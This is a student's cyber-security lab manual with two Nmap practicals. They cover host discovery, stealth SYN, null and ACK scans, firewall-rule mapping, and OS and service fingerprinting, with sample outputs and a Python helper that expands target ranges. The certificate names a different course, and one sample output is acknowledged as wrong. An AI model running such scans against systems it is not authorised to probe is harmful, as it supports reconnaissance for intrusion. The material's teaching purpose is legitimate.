
KALOL INSTITUTE OF TECHNOLOGY AND RESEARCH CENTRE

LAB MANUAL OF CYBER SECURITY

Subject code: 3150714

B.E. 5th SEMESTER

Student Name: Kishan Mewada
Enrollment Number: 230263116020
Branch: IT
List of Experiments

Sr. No.  Experiment Name                                 Date   Page No.   Sign
1        TCP scanning using NMAP
2        Port scanning using NMAP
3        TCP/UDP connectivity using Netcat
4        Network vulnerability scanning using OpenVAS
5        Web application testing using DVWA
6        Manual SQL injection using DVWA
7        Web XSS using DVWA
8        Automated SQL injection with SqlMap
CERTIFICATE

This is to certify that the lab experiments entitled "IOT AND APPLICATIONS (3171108)" submitted by Kishan Mewada (230263116020), towards the partial fulfillment of the requirements for the completion of the 5th semester of Bachelor of Engineering in IT, were carried out at Kalol Institute of Technology & Research Centre, Kalol.

Date: 20.10.24

Place: Ahmedabad

PROF. SAUMIL BAROT                Mrs. SHILPA SERASIYA
Teacher in charge                 Head of Department


Cyber Security 3150714

Practical: 1
Aim: TCP scanning using NMAP

Nmap (Network Mapper) is an open-source and very versatile tool for Linux system and network administrators. It is used for exploring networks, performing security scans and network audits, and finding open ports on remote machines. It discovers live hosts, operating systems, packet filters, and the open ports and services running on remote hosts.

In this setup, two servers without a firewall are used to demonstrate the Nmap commands. A port scan is intrusive traffic even when it looks harmless, so run these commands only against hosts you own or are authorised to test.

1. 192.168.0.100 – server1.tecmint.com
2. 192.168.0.101 – server2.tecmint.com

Nmap command usage

# nmap [Scan Type(s)] [Options] {target specification}

How to Install NMAP in Linux

Most of today's Linux distributions, such as Red Hat, CentOS, Fedora, Debian and Ubuntu, ship Nmap in their default package repositories, managed with yum (Red Hat family) or APT (Debian family). Install it with the command for your distribution:

# yum install nmap            [on Red Hat based systems]
$ sudo apt-get install nmap   [on Debian based systems]

1. Scan a System with Hostname and IP Address

The Nmap tool offers various ways to scan a system. In this example the scan is run against the hostname server2.tecmint.com to find all open ports, the services behind them and the MAC address of the system.

Scan using Hostname

[root@server1 ~]# nmap server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:42 EST

Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown


3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.415 seconds


You have new mail in /var/spool/mail/root

Scan using IP Address

[root@server1 ~]# nmap 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:04 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.465 seconds


You have new mail in /var/spool/mail/root

2. Scan using “-v” option

You can see that the below command with “-v” option is giving more detailed information about
the remote machine.

[root@server1 ~]# nmap -v server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:43 EST


Initiating ARP Ping Scan against 192.168.0.101 [1 port] at 15:43
The ARP Ping Scan took 0.01s to scan 1 total hosts.
Initiating SYN Stealth Scan against server2.tecmint.com (192.168.0.101) [1680 ports] at 15:43
Discovered open port 22/tcp on 192.168.0.101
Discovered open port 80/tcp on 192.168.0.101
Discovered open port 8888/tcp on 192.168.0.101
Discovered open port 111/tcp on 192.168.0.101
Discovered open port 3306/tcp on 192.168.0.101
Discovered open port 957/tcp on 192.168.0.101
The SYN Stealth Scan took 0.30s to scan 1680 total ports.
Host server2.tecmint.com (192.168.0.101) appears to be up ... good.


Interesting ports on server2.tecmint.com (192.168.0.101):


Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.485 seconds


Raw packets sent: 1681 (73.962KB) | Rcvd: 1681 (77.322KB)

3. Scan Multiple Hosts

You can scan multiple hosts by simply listing their IP addresses or hostnames on the Nmap command line.

[root@server1 ~]# nmap 192.168.0.101 192.168.0.102 192.168.0.103

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:06 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 3 IP addresses (1 host up) scanned in 0.580 seconds

4. Scan a whole Subnet

You can scan a whole subnet or IP range with Nmap by providing * wildcard with it.

[root@server1 ~]# nmap 192.168.0.*

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:11 EST


Interesting ports on server1.tecmint.com (192.168.0.100):
Not shown: 1677 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
851/tcp open unknown


Interesting ports on server2.tecmint.com (192.168.0.101):


Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 256 IP addresses (2 hosts up) scanned in 5.550 seconds


You have new mail in /var/spool/mail/root

In the above output nmap scanned the whole subnet and reported only those hosts that are up on the network.

5. Scan Multiple Servers using the last octet of the IP address

You can scan multiple IP addresses by listing only their last octets, separated by commas. For example, here the scan covers 192.168.0.101, 192.168.0.102 and 192.168.0.103.

[root@server1 ~]# nmap 192.168.0.101,102,103

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 3 IP addresses (1 host up) scanned in 0.552 seconds


You have new mail in /var/spool/mail/root

6. Scan a list of Hosts from a File

If you have more hosts to scan and their details are written in a file, you can ask nmap to read that file and scan every entry. Let's see how to do that.


Create a text file called “nmaptest.txt” and define all the IP addresses or hostname of the server
that you want to do a scan.

[root@server1 ~]# cat > nmaptest.txt

localhost
server2.tecmint.com
192.168.0.101

Next, run nmap with the “-iL” option to scan all the addresses listed in the file.

[root@server1 ~]# nmap -iL nmaptest.txt

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:58 EST


Interesting ports on localhost.localdomain (127.0.0.1):
Not shown: 1675 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
111/tcp open rpcbind
631/tcp open ipp
857/tcp open unknown

Interesting ports on server2.tecmint.com (192.168.0.101):


Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Interesting ports on server2.tecmint.com (192.168.0.101):


Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)


Nmap finished: 3 IP addresses (3 hosts up) scanned in 2.047 seconds

7. Scan an IP Address Range

You can specify an IP range while performing scan with Nmap.

[root@server1 ~]# nmap 192.168.0.101-110

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 10 IP addresses (1 host up) scanned in 0.542 seconds

8. Scan a Network Excluding Remote Hosts

You can exclude some hosts from a full network or wildcard scan with the “--exclude” option.

[root@server1 ~]# nmap 192.168.0.* --exclude 192.168.0.100

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:16 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 255 IP addresses (1 host up) scanned in 5.313 seconds


You have new mail in /var/spool/mail/root
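The target expressions used in sections 3 to 8 (a comma list of last octets, a dash range, the * wildcard, CIDR, a hostname and --exclude) follow one small grammar, and the counts nmap prints (256 addresses for 192.168.0.*, 10 for 192.168.0.101-110, 255 once 192.168.0.100 is excluded) fall straight out of it. The following Python script is an added example, not part of this manual or of nmap itself: it expands nmap-style IPv4 target specifications into the address list nmap would actually probe, using only the standard library. The short octet-range forms (-20, 250-) are assumed from nmap's documented target syntax; hostnames are passed through unresolved.

```python
import ipaddress
from itertools import product

# Characters that can appear in an nmap IPv4 target specification;
# anything else (letters in particular) is treated as a hostname.
_IP_SPEC_CHARS = set("0123456789.,-*/")


def _expand_octet(spec):
    """Expand one octet field of an nmap target: '101', '101-110', '*',
    '1,5,9-12', '-20' (meaning 0-20) or '250-' (meaning 250-255)."""
    values = set()
    for part in spec.split(","):
        if part == "*":
            values.update(range(256))
        elif "-" in part:
            lo, hi = part.split("-", 1)
            values.update(range(int(lo) if lo else 0, (int(hi) if hi else 255) + 1))
        else:
            values.add(int(part))
    if any(v < 0 or v > 255 for v in values):
        raise ValueError("octet out of range in %r" % spec)
    return sorted(values)


def expand_target(spec):
    """Expand a single target the way nmap does. CIDR (192.168.1.0/24) yields all
    256 addresses, network and broadcast included, which is why `nmap 192.168.0.*`
    and a /24 both report '256 IP addresses'. Hostnames are passed through."""
    if not set(spec) <= _IP_SPEC_CHARS:
        return [spec]
    if "/" in spec:
        # strict=False lets 192.168.1.1/24 stand for the whole 192.168.1.0/24 block
        return [str(a) for a in ipaddress.ip_network(spec, strict=False)]
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError("expected four octets in %r" % spec)
    return [".".join(str(o) for o in combo)
            for combo in product(*(_expand_octet(o) for o in octets))]


def expand_targets(specs, exclude=()):
    """Expand several targets (as typed on the nmap command line) in order,
    dropping duplicates and anything matched by the --exclude list."""
    excluded = set()
    for ex in exclude:
        excluded.update(expand_target(ex))
    result, seen = [], set()
    for spec in specs:
        for target in expand_target(spec):
            if target in seen or target in excluded:
                continue
            seen.add(target)
            result.append(target)
    return result


if __name__ == "__main__":
    # Constructed inputs mirroring the command lines in sections 3 to 8.
    for args in (["192.168.0.101,102,103"], ["192.168.0.101-110"],
                 ["192.168.0.*"], ["192.168.1.0/24"]):
        print(" ".join(args), "->", len(expand_targets(args)), "addresses")
    print("192.168.0.* --exclude 192.168.0.100 ->",
          len(expand_targets(["192.168.0.*"], exclude=["192.168.0.100"])), "addresses")
```

Run it to print the address counts; the same function can produce a reviewed list to feed into nmap -iL after removing any addresses you are not authorised to scan.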

9. Scan OS information and Traceroute


With Nmap, you can detect which OS and version is running on the remote host. To enable OS
& version detection, script scanning and traceroute, we can use “-A” option with NMAP.

[root@server1 ~]# nmap -A 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:25 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi). TCP/IP fingerprint:

SInfo(V=4.11%P=i686-redhat-linux-gnu%D=11/11%Tm=52814B66%O=22%C=1%M=080027)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Uptime 0.169 days (since Mon Nov 11 12:22:15 2013)

Nmap finished: 1 IP address (1 host up) scanned in 22.271 seconds


You have new mail in /var/spool/mail/root

In the above output nmap has produced a TCP/IP fingerprint of the remote host's OS and is more specific about the services and versions behind each port. No exact OS match was found here, so nmap prints the raw fingerprint instead of a guess.

10. Enable OS Detection with Nmap

Use the “-O” option to run OS detection on its own; adding “--osscan-guess” makes nmap print its closest matches even when no fingerprint matches exactly.

[root@server1 ~]# nmap -O server2.tecmint.com


Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:40 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi). TCP/IP fingerprint:

SInfo(V=4.11%P=i686-redhat-linux-gnu%D=11/11%Tm=52815CF4%O=22%C=1%M=080027)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Uptime 0.221 days (since Mon Nov 11 12:22:16 2013)

Nmap finished: 1 IP address (1 host up) scanned in 11.064 seconds


You have new mail in /var/spool/mail/root

11. Scan a Host to Detect Firewall Rules

An ACK scan “-sA” never reports ports as open. It sends bare ACK packets and classifies each port as unfiltered (a RST came back, so packets reach the host) or filtered (no answer or an ICMP error, so something in between is dropping traffic). It is used to map packet-filter rules, not to find services. The target here has no firewall, so every port is unfiltered.

[root@server1 ~]# nmap -sA 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:27 EST


All 1680 scanned ports on server2.tecmint.com (192.168.0.101) are UNfiltered
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.382 seconds

You have new mail in /var/spool/mail/root

12. Scan a Host Without Host Discovery (when a firewall blocks ping)

By default nmap pings a target first and skips it if there is no reply. When packet filtering or a firewall blocks the ping probes, “-PN” (spelled “-Pn” in current nmap releases) tells nmap to assume the host is up and port-scan it anyway.

[root@server1 ~]# nmap -PN 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:30 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.399 seconds

13. Find Live Hosts in a Network

With the “-sP” option (renamed “-sn” in later nmap releases) nmap only checks which hosts are up on the network; it skips port scanning and everything else.

[root@server1 ~]# nmap -sP 192.168.0.*

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:01 EST


Host server1.tecmint.com (192.168.0.100) appears to be up.
Host server2.tecmint.com (192.168.0.101) appears to be up.
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 256 IP addresses (2 hosts up) scanned in 5.109 seconds

14. Perform a Fast Scan

A fast scan with the “-F” option scans only the ports listed in the nmap-services file (the most common ones) and skips all other ports; note the smaller “Not shown” count below.

[root@server1 ~]# nmap -F 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:47 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1234 closed ports
PORT STATE SERVICE


22/tcp open ssh


80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.322 seconds

15. Find Nmap version

You can find out Nmap version you are running on your machine with “-V” option.

[root@server1 ~]# nmap -V

Nmap version 4.11 ( http://www.insecure.org/nmap/ )


You have new mail in /var/spool/mail/root

16. Scan Ports Consecutively

Use the “-r” flag to scan ports in sequential order instead of nmap's default randomised order. This is easier to follow in a packet capture, but the predictable pattern is also easier for an IDS to recognise.

[root@server1 ~]# nmap -r 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:52 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.363 seconds

17. Print Host Interfaces and Routes

You can list the scanning host's own network interfaces and routing table with the “--iflist” option (no target is needed).

[root@server1 ~]# nmap --iflist



Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:07 EST


************************INTERFACES************************
DEV  (SHORT) IP/MASK           TYPE     UP MAC
lo   (lo)    127.0.0.1/8       loopback up
eth0 (eth0)  192.168.0.100/24  ethernet up 08:00:27:11:C7:89

**************************ROUTES**************************
DST/MASK       DEV  GATEWAY
192.168.0.0/0  eth0
169.254.0.0/0  eth0

In the above output nmap lists the interfaces attached to the scanning system and their respective routes.

18. Scan for specific Port

There are various options to discover ports on remote machine with Nmap. You can specify the
port you want nmap to scan with “-p” option, by default nmap scans only TCP ports.

[root@server1 ~]# nmap -p 80 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:12 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) sca

19. Scan a TCP Port

You can also specify specific port types and numbers with nmap to scan.

[root@server1 ~]# nmap -p T:8888,80 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
80/tcp open http
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds

20. Scan a UDP Port

UDP ports need the UDP scan type “-sU”, and the port is still selected with “-p” (without “-p”, nmap would treat “53” as a second target). UDP scanning is slow and ambiguous: a port that does not answer the probe is reported as open|filtered, because a dropped packet and a silent service look the same on the wire.

[root@server1 ~]# nmap -sU -p 53 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST
Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
53/udp open http
8888/udp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds

The output as captured above is not what a UDP scan of port 53 produces: nmap labels 53/udp as “domain”, and an unrequested 8888/udp line would not appear. Rerun the corrected command to obtain real results.

21. Scan Multiple Ports

You can also scan multiple ports using option “-p“.

[root@server1 ~]# nmap -p 80,443 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:56 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
80/tcp open http
443/tcp closed https
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.190 seconds

22. Scan a Port Range

You can scan a contiguous range of ports by giving “-p” a start-end expression.

[root@server1 ~]# nmap -p 80-160 192.168.0.101

23. Find Host Services version Numbers

We can find out service’s versions which are running on remote hosts with “-sV” option.

[root@server1 ~]# nmap -sV 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:48 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32

MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 12.624 seconds

24. Host discovery with TCP ACK (-PA) and TCP SYN (-PS) probes

Packet-filtering firewalls often drop the ICMP echo requests nmap uses for host discovery. The “-PS” and “-PA” options replace the ping with a TCP SYN or TCP ACK packet (to port 80 by default; “-PS22,443” selects other ports) to decide whether the host is up before the port scan runs. They change only the discovery step, not the port-scan technique.

[root@server1 ~]# nmap -PS 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:51 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds


You have new mail in /var/spool/mail/root

25. Scan Remote host for specific ports with TCP ACK

[root@server1 ~]# nmap -PA -p 22,80 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:02 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.166 seconds


You have new mail in /var/spool/mail/root

26. Scan Remote host for specific ports with TCP Syn

[root@server1 ~]# nmap -PS -p 22,80 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:08 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.165 seconds


You have new mail in /var/spool/mail/root

27. Perform a Stealthy Scan

The SYN scan “-sS” sends a SYN to each port and never completes the handshake (the SYN/ACK from an open port is answered with RST), so the service itself never sees a connection. It needs root for raw sockets and is nmap's default scan type when run as root.

[root@server1 ~]# nmap -sS 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:10 EST
Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds


You have new mail in /var/spool/mail/root

28. Perform a TCP Connect Scan

The “-sT” option completes the full three-way handshake through the operating system's connect() call. It needs no special privileges (it is the default for non-root users), but every open port sees a real connection, which the service may log.

[root@server1 ~]# nmap -sT 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:12 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.406 seconds


You have new mail in /var/spool/mail/root

29. Perform a TCP Null Scan

A null scan “-sN” sends packets with no TCP flags set. A closed port must answer with RST, while an open (or filtered) port stays silent, so open ports are reported as open|filtered. It can slip past simple stateless filters that only look for SYN packets, but it does not work against Windows targets, which reply RST regardless of port state.

[root@server1 ~]# nmap -sN 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 19:01 EST


Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
957/tcp open|filtered unknown
3306/tcp open|filtered mysql
8888/tcp open|filtered sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 1.584 seconds
You have new mail in /var/spool/mail/root

Practical: 2
Aim: Port scanning using NMAP

Nmap (Network Mapper) is the most popular port scanner and network discovery tool in use, and it is available for all major platforms. In this practical we learn the basics of nmap and see how it is used to scan a network and its ports.

Install on Ubuntu

$ sudo apt-get install nmap

1) Scan network for live hosts - Ping Probe/Ping Sweep

This is the first and most basic form of network scan that can be done with nmap, to detect
hosts that are alive and responding on the network.
$ nmap -sP 192.168.1.1-254

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 18:45 IST


Nmap scan report for 192.168.1.1
Host is up (0.0069s latency).
Nmap scan report for 192.168.1.2
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.101
Host is up (0.000065s latency).
Nmap done: 254 IP addresses (3 hosts up) scanned in 6.64 seconds

The above command scans all IP addresses from 192.168.1.1 to 192.168.1.254; that range is written with the short syntax 192.168.1.1-254.

CIDR notation can also be used, for example 192.168.1.1/24 (nmap ignores the host bits and scans the whole block). Note: in CIDR notation the number after the slash is the count of leading bits of the address that stay constant, so /24 means that "192.168.1" (8 bits x 3) is fixed and nmap scans all 256 addresses of that block.

2) Avoid DNS resolution

When doing ping sweeps, nmap attempts reverse DNS resolution of every target address. This is generally not needed, slows the sweep down and sends a query for each address to the DNS server; it can be disabled with the -n option.

$ nmap -sP -n 192.168.1.1-255

3) Port scan a host

To port scan a particular host, the command would be:

$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 19:01 IST


Nmap scan report for 192.168.1.1
Host is up (0.058s latency).

Not shown: 998 closed ports


PORT STATE SERVICE
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds


That is the simplest nmap command. Nmap scans the target host for open ports; the target can be an IP address or a host/domain name. For each port nmap reports the port number, its state and the service conventionally associated with that number, for example port 80 is http. The service name comes from nmap's port table, not from the traffic itself, so an open port 80 most probably serves web pages, but only version detection (-sV, below) confirms what is actually listening.

If you wish to dig deeper and analyse what nmap is doing behind the scenes, run a packet sniffer such as Wireshark alongside it and inspect the packets nmap generates and sends.

Getting the daemon/service banner or version information

Nmap can try to determine the version of each service running on the host by reading banners and sending protocol-specific probes. The -sV flag enables this:

$ nmap -sV localhost

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 19:15 IST


Nmap scan report for localhost (127.0.0.1)
Host is up (0.00041s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain dnsmasq 2.59
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
631/tcp open ipp CUPS 1.5
3000/tcp open ntop-http Ntop web interface 4.1.0
3306/tcp open mysql MySQL 5.5.24-0ubuntu0.12.04.1
9050/tcp open tor-socks Tor SOCKS Proxy
Service Info: Host: enlightened-desktop; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .


